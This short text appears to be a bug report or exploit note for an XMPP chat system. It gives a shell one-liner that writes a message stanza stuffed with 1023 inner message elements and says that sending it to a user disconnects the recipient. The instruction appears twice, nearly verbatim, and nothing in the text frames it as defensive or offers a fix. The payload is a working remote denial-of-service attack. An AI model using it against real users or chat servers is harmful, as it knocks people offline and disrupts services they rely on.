Create a simple message with echo "<message to=\"user@domain\" id=\"goodbye\"><body>">msg;for i in `seq 1 1023`; do echo "<message arg=\"$i\"/>">>msg; done;echo "</body></message>">>msg and send it to a user. The receiving user (not the sender) will be disconnected.
Create a simple message with
echo "<message to=\"user@domain\" id=\"goodbye\"><body>">msg;for i in `seq 1 1023`; do echo "<message arg=\"$i\"/>">>msg; done;echo "</body></message>">>msg
and send it to a user.
The receiving user (not the sender) will be disconnected.